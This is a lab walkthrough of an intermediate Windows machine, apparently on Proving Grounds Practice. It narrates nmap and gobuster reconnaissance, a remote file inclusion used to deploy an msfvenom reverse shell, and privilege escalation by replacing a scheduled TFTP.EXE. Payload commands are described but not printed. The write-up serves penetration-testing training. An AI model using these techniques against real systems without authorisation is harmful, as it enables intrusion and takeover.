Difficulty – Intermediate
Platform – Proving Grounds Practice
Operating System – Windows
Focus Areas
- Remote File Inclusion (RFI)
- Reverse Shell Deployment
- Weak File Permission Abuse
- Scheduled Task Exploitation
- Linux Privilege Escalation
In this writeup, we exploit a Remote File Inclusion vulnerability in a web application to achieve remote command execution and deploy a reverse shell. After gaining an initial foothold, we escalate privileges by abusing weak file permissions and replacing a scheduled executable executed by an administrative task to obtain elevated access.
Recon & Enumeration
Enumeration plays a very significant role in pen testing. The more properly you enumerate the more it will be easy to get a foothold on the target.
First, we will check whether target is reachable or not with ping command:
ping Target_IP
With ping command output we found that the target is reachable.
Now let’s move ahead and run the port scan for which we will be using Nmap a popular tool for port scanning and it will provide details of the various ports which are in Open state. The command for that will be:
nmap -sC -sV -O -oA nmap/initial 192.168.234.53
nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.234.53
I discovered these ports are open:
- 21/tcp – FTP service running FileZilla FTP Server 0.9.41 beta
- 135/tcp – MSRPC service running Microsoft Windows RPC
- 139/tcp – NetBIOS Session Service running Microsoft Windows NetBIOS-SSN
- 445/tcp – SMB service (Microsoft-DS) exposed
- 3306/tcp – MySQL/MariaDB database service running MariaDB 10.3.24 or later
- 4443/tcp – HTTP service running Apache httpd 2.4.43 (Win64) with OpenSSL 1.1.1g and PHP 7.4.6 (XAMPP dashboard exposed)
- 5040/tcp – Unknown service exposed (commonly associated with Windows services; requires further enumeration)
- 8080/tcp – HTTP service running Apache httpd 2.4.43 (Win64) with OpenSSL 1.1.1g and PHP 7.4.6 (XAMPP dashboard exposed)
- 49664/tcp – MSRPC service running Microsoft Windows RPC
- 49665/tcp – MSRPC service running Microsoft Windows RPC
- 49666/tcp – MSRPC service running Microsoft Windows RPC
- 49667/tcp – MSRPC service running Microsoft Windows RPC
- 49668/tcp – MSRPC service running Microsoft Windows RPC
- 49669/tcp – MSRPC service running Microsoft Windows RPC
- OS: Microsoft Windows (likely Windows Server 2019 / Windows 10 x64)
Then I went ahead and checked the IP in the web browser on port 8080 and I found a page running XAMPP:
I quickly ran a gobuster scan to look for different directories:
Based on the result I found that /site was redirecting to another page:
The page was vulnerable to LFI and I tried to check for RFI and it exists:
Exploitation
I used msfvenom to create a reverse shell payload and served it over python server:
A successful initial foothold was obtained:
I found the local.txt flag.
Privilege Escalation
Now it was a time for escalating the privileges and I found that TFTP.EXE runs every 5 minutes.
So I replaced TFTP .EXE with a malicious shell file and generated the reverse shell using msfvenom and uploded using certutil.exe:
I started the netcat listener on port 21 and post 5 minutes the TFTP.EXE executed as part of the scheduled task and admin shell was obtained:
The above image shows the proof.txt file.
Key Takeaways
- Enumeration should not stop after identifying the obvious attack surface.
- Writable scheduled task components can become powerful privilege escalation vectors.
- Small misconfigurations in automated processes often lead to full compromise.
- Understanding how applications interact with system files is critical during post-exploitation.
- Privilege escalation frequently depends on analyzing what executes with elevated permissions.
- Revisiting enumeration with a different perspective can reveal overlooked attack paths.
If you enjoyed this post, share it with your friends and colleagues!